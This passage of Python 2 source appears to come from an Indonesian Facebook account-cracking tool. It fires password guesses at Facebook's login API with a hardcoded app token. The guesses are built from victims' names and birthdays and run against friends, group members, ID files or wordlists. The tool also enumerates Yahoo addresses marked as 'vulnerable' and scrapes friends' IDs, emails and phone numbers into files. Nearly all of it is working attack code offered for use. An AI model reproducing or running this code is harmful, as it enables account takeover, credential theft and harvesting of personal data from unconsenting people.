= urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') y = json.load(data) if 'access_token' in y: print '\x1b[1;91m[+] \x1b[1;92mFounded.' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz5 raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_hack() else: if 'www.facebook.com' in y['error_msg']: print '\x1b[1;91m[+] \x1b[1;92mFounded.' print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz5 raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_hack() else: print '\x1b[1;91m[!] Sorry, opening password target failed :(' print '\x1b[1;91m[!] Try other method.' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_hack() except KeyError: print '\x1b[1;91m[!] Terget not found' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_hack() def crack(): global file global idlist global passw os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(0.01) login() else: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m') passw = raw_input('\x1b[1;91m[+] \x1b[1;92mPassword \x1b[1;91m: \x1b[1;97m') try: file = open(idlist, 'r') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') for x in range(40): zedd = threading.Thread(target=scrak, args=()) zedd.start() threads.append(zedd) for zedd in threads: zedd.join() except IOError: print '\x1b[1;91m[!] File not found' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_hack() def scrak(): global back global berhasil global cekpoint global gagal global up try: buka = open(idlist, 'r') up = buka.read().split() while file: username = file.readline().strip() url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + passw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6' data = urllib.urlopen(url) mpsh = json.load(data) if back == len(up): break if 'access_token' in mpsh: bisa = open('Berhasil.txt', 'w') bisa.write(username + ' | ' + passw + '\n') bisa.close() berhasil.append('\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + username + ' | ' + passw) back += 1 else: if 'www.facebook.com' in mpsh['error_msg']: cek = open('Cekpoint.txt', 'w') cek.write(username + ' | ' + passw + '\n') cek.close() cekpoint.append('\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + username + ' | ' + passw) back += 1 else: gagal.append(username) back += 1 sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;91m:\x1b[1;97m ' + str(back) + ' \x1b[1;96m>\x1b[1;97m ' + str(len(up)) + ' =>\x1b[1;92mLive\x1b[1;91m:\x1b[1;96m' + str(len(berhasil)) + ' \x1b[1;97m=>\x1b[1;93mCheck\x1b[1;91m:\x1b[1;96m' + str(len(cekpoint))) sys.stdout.flush() except IOError: print '\n\x1b[1;91m[!] Connection busy' time.sleep(0.01) except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] No connection' def hasil(): print print 52 * '\x1b[1;97m\xe2\x95\x90' for b in berhasil: print b for c in cekpoint: print c print print '\x1b[31m[x] Failed \x1b[1;97m--> ' + str(len(gagal)) keluar() def super(): global toket os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '║-> \x1b[1;37;40m1. Crack from Friends' print '║-> \x1b[1;37;40m2. Crack from Group' print '║-> \x1b[1;37;40m3. Crack from File' print '║-> \x1b[1;31;40m0. Kembali' print '\x1b[1;37;40m║' pilih_super() def pilih_super(): peak = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ') if peak == '': print '\x1b[1;91m[!] Can\'t empty' pilih_super() else: if peak == '1': os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' jalan('\x1b[1;91m[+] \x1b[1;92mMengambil id Teman \x1b[1;97m...') r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket) z = json.loads(r.text) for s in z['data']: id.append(s['id']) else: if peak == '2': os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' idg = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ') try: r = requests.get('https://graph.facebook.com/group/?id=' + idg + '&access_token=' + toket) asw = json.loads(r.text) print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName grup \x1b[1;91m:\x1b[1;97m ' + asw['name'] except KeyError: print '\x1b[1;91m[!] Group not found' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') super() re = requests.get('https://graph.facebook.com/' + idg + '/members?fields=name,id&limit=999999999&access_token=' + toket) s = json.loads(re.text) for i in s['data']: id.append(i['id']) else: if peak == '3': os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' try: idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m') for line in open(idlist,'r').readlines(): id.append(line.strip()) except IOError: print '\x1b[1;91m[!] File not found' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') super() else: if peak == '0': menu_hack() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + peak + ' \x1b[1;91mTidak ada' pilih_super() print '\x1b[1;91m[+] \x1b[1;92mTotal ID \x1b[1;91m: \x1b[1;97m' + str(len(id)) jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...') titik = ['. ', '.. ', '... '] for o in titik: print '\r\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;97m' + o, sys.stdout.flush() time.sleep(0.01) print print 52 * '\x1b[1;97m\xe2\x95\x90' def main(arg): user = arg try: a = requests.get('https://graph.facebook.com/' + user + '/?access_token=' + toket) b = json.loads(a.text) pass1 = b['first_name'] + '123' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass1 + ' --> ' + b['name'] else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass1 + ' --> ' + b['name'] else: pass2 = b['firs_name'] + '12345' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass2 + ' --> ' + b['name'] else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass2 + ' --> ' + ['name'] else: pass3 = b['last_name'] + '123' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass3 + ' --> ' + b['name'] else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass3 + ' --> ' + b['name'] else: pass4 = b['last_name'] + '12345' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass4 + ' --> ' + b['name'] else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass4 + ' --> ' + b['name'] else: birthday = b['birthday'] pass5 = birthday.replace('/', '') data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass5 + ' --> ' + b['name'] else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;97m[\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass5 + ' --> ' + b['name'] else: pass6 = ('sayang') data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass6 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass6 + ' --> ' + b['name'] else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass6 + ' --> ' + b['name'] except: pass p = ThreadPool(30) p.map(main, id) print '\n\x1b[1;91m[+] \x1b[1;97mSelesai' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') super() def brute(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(0.5) login() else: os.system('clear') print logo print '╔' + 52 * '\x1b[1;97m\xe2\x95\x90' try: email = raw_input('\x1b[1;91m[+] \x1b[1;92mID\x1b[1;97m/\x1b[1;92mEmail\x1b[1;97m/\x1b[1;92mHp \x1b[1;97mTarget \x1b[1;91m:\x1b[1;97m ') passw = raw_input('\x1b[1;91m[+] \x1b[1;92mWordlist \x1b[1;97mext(list.txt) \x1b[1;91m: \x1b[1;97m') total = open(passw, 'r') total = total.readlines() print 52 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mTarget \x1b[1;91m:\x1b[1;97m ' + email print '\x1b[1;91m[+] \x1b[1;92mTotal\x1b[1;96m ' + str(len(total)) + ' \x1b[1;92mPassword' jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') sandi = open(passw, 'r') for pw in sandi: try: pw = pw.replace('\n', '') sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mTry \x1b[1;97m' + pw) sys.stdout.flush() data = requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + email + '&locale=en_US&password=' + pw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') mpsh = json.loads(data.text) if 'access_token' in mpsh: dapat = open('Brute.txt', 'w') dapat.write(email + ' | ' + pw + '\n') dapat.close() print '\n\x1b[1;91m[+] \x1b[1;92mFounded.' print 52 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw keluar() else: if 'www.facebook.com' in mpsh['error_msg']: ceks = open('Brutecekpoint.txt', 'w') ceks.write(email + ' | ' + pw + '\n') ceks.close() print '\n\x1b[1;91m[+] \x1b[1;92mFounded.' print 52 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint' print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw keluar() except requests.exceptions.ConnectionError: print '\x1b[1;91m[!] Connection Error' time.sleep(1) except IOError: print '\x1b[1;91m[!] File not found...' print '\n\x1b[1;91m[!] \x1b[1;92mSepertinya kamu tidak memiliki wordlist' tanyaw() def tanyaw(): why = raw_input('\x1b[1;91m[?] \x1b[1;92mKamu ingin membuat wordlist ? \x1b[1;92m[y/t]\x1b[1;91m:\x1b[1;97m ') if why == '': print '\x1b[1;91m[!] Mohon Pilih \x1b[1;97m(y/t)' tanyaw() else: if why == 'y': wordlist() else: if why == 'Y': wordlist() else: if why == 't': menu_hack() else: if why == 'T': menu_hack() else: print '\x1b[1;91m[!] Mohon Pilih \x1b[1;97m(y/t)' tanyaw() def menu_yahoo(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '║-> \x1b[1;37;40m1. From Friends' print '║-> \x1b[1;37;40m2. From File' print '║-> \x1b[1;31;40m0. Back' print '\x1b[1;37;40m║' yahoo_pilih() def yahoo_pilih(): go = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ') if go == '': print '\x1b[1;91m[!] Can\'t empty' yahoo_pilih() else: if go == '1': yahoofriends() else: if go == '2': yahoolist() else: if go == '0': menu_hack() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + go + ' \x1b[1;91mTidak Ditemukan' yahoo_pilih() def yahoofriends(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token Tidak Ada' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' mpsh = [] jml = 0 jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...') friends = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket) kimak = json.loads(friends.text) save = open('MailVuln.txt', 'w') print 52 * '\x1b[1;97m\xe2\x95\x90' for w in kimak['data']: jml += 1 mpsh.append(jml) id = w['id'] nama = w['name'] links = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket) z = json.loads(links.text) try: mail = z['email'] yahoo = re.compile('@.*') otw = yahoo.search(mail).group() if 'yahoo.com' in otw: br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com') br._factory.is_html = True br.select_form(nr=0) br['username'] = mail klik = br.submit().read() jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*') try: pek = jok.search(klik).group() except: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]' continue if '"messages.ERROR_INVALID_USERNAME">' in pek: save.write(mail + '\n') print 52 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + nama print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;97m ' + mail + ' [\x1b[1;92m' + vuln + '\x1b[1;97m]' print 52 * '\x1b[1;97m\xe2\x95\x90' else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]' except KeyError: pass print '\n\x1b[1;91m[+] \x1b[1;97mSelesai' print '\x1b[1;91m[+] \x1b[1;97mSimpan \x1b[1;91m:\x1b[1;97m MailVuln.txt' save.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_yahoo() def yahoolist(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' files = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m: \x1b[1;97m') try: total = open(files, 'r') mail = total.readlines() except IOError: print '\x1b[1;91m[!] File not found' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_yahoo() mpsh = [] jml = 0 jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') save = open('MailVuln.txt', 'w') print 52 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[?] \x1b[1;97mStatus \x1b[1;91m: \x1b[1;97mRed[\x1b[1;92m' + vulnot + '\x1b[1;97m] Green[\x1b[1;92m' + vuln + '\x1b[1;97m]' print mail = open(files, 'r').readlines() for pw in mail: mail = pw.replace('\n', '') jml += 1 mpsh.append(jml) yahoo = re.compile('@.*') otw = yahoo.search(mail).group() if 'yahoo.com' in otw: br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com') br._factory.is_html = True br.select_form(nr=0) br['username'] = mail klik = br.submit().read() jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*') try: pek = jok.search(klik).group() except: print '\x1b[1;91m ' + mail continue if '"messages.ERROR_INVALID_USERNAME">' in pek: save.write(mail + '\n') print '\x1b[1;92m ' + mail else: print '\x1b[1;91m ' + mail print '\n\x1b[1;91m[+] \x1b[1;97mFinish' print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m:\x1b[1;97m MailVuln.txt' save.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_yahoo() def grab(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '║-> \x1b[1;37;40m1. Get ID From Friends' print '║-> \x1b[1;37;40m2. Get Friends ID From Friends' print '║-> \x1b[1;37;40m3. Get ID From GRUP' print '║-> \x1b[1;37;40m4. Get Friends Email' print '║-> \x1b[1;37;40m5. Get Friends Email From Friends' print '║-> \x1b[1;37;40m6. Get Phone From Friends' print '║-> \x1b[1;37;40m7. Get Friend\'s Phone From Friends' print '║-> \x1b[1;31;40m0. Back' print '\x1b[1;37;40m║' grab_pilih() def grab_pilih(): cuih = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ') if cuih == '': print '\x1b[1;91m[!] Can\'t empty' grab_pilih() else: if cuih == '1': id_friends() else: if cuih == '2': idfrom_friends() else: if cuih == '3': id_member_grup() else: if cuih == '4': email() else: if cuih == '5': emailfrom_friends() else: if cuih == '6': nomor_hp() else: if cuih == '7': hpfrom_friends() else: if cuih == '0': menu_hack() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + cuih + ' \x1b[1;91mnot found' grab_pilih() def id_friends(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket) z = json.loads(r.text) save_id = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') bz = open(save_id, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' for ah in z['data']: idfriends.append(ah['id']) bz.write(ah['id'] + '\n') print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name'] print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id'] print 52 * '\x1b[1;97m\xe2\x95\x90' print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfriends) print '\x1b[1;91m[+] \x1b[1;97mFile Disimpan \x1b[1;91m: \x1b[1;97m' + save_id bz.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Error when creating file' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Stopped' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except KeyError: os.remove(save_id) print '\x1b[1;91m[!] An error occurred' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] No connection' keluar() def idfrom_friends(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m') try: jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket) op = json.loads(jok.text) print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name'] except KeyError: print '\x1b[1;91m[!] Not be friends' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() r = requests.get('https://graph.facebook.com/' + idt + '?fields=friends.limit(5000)&access_token=' + toket) z = json.loads(r.text) save_idt = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') bz = open(save_idt, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' for ah in z['friends']['data']: idfromfriends.append(ah['id']) bz.write(ah['id'] + '\n') print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name'] print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id'] print 52 * '\x1b[1;97m\xe2\x95\x90' print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfromfriends) print '\x1b[1;91m[+] \x1b[1;97mFile Disimpan \x1b[1;91m: \x1b[1;97m' + save_idt bz.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Error when creating file' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Stopped' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] No connection' keluar() def id_member_grup(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' id = raw_input('\x1b[1;91m[+] \x1b[1;92mID grup \x1b[1;91m:\x1b[1;97m ') try: r = requests.get('https://graph.facebook.com/group/?id=' + id + '&access_token=' + toket) asw = json.loads(r.text) print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name'] except KeyError: print '\x1b[1;91m[!] Group not found' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() simg = raw_input('\x1b[1;91m[+] \x1b[1;97mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') b = open(simg, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' re = requests.get('https://graph.facebook.com/' + id + '/members?fields=name,id&access_token=' + toket) s = json.loads(re.text) for i in s['data']: idmem.append(i['id']) b.write(i['id'] + '\n') print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + i['name'] print '\x1b[1;92mID \x1b[1;91m :\x1b[1;97m ' + i['id'] print 52 * '\x1b[1;97m\xe2\x95\x90' print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idmem) print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + simg b.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Error when creating file' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Stopped' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except KeyError: os.remove(simg) print '\x1b[1;91m[!] Group not found' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] No connection' keluar() def email(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket) a = json.loads(r.text) mpsh = open(mails, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' for i in a['data']: x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket) z = json.loads(x.text) try: em.append(z['email']) mpsh.write(z['email'] + '\n') print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name'] print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email'] print 52 * '\x1b[1;97m\xe2\x95\x90' except KeyError: pass print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(em) print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails mpsh.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Error when creating file' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Stopped' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except KeyError: os.remove(mails) print '\x1b[1;91m[!] An error occurred' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] No connection' keluar() def emailfrom_friends(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m') try: jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket) op = json.loads(jok.text) print 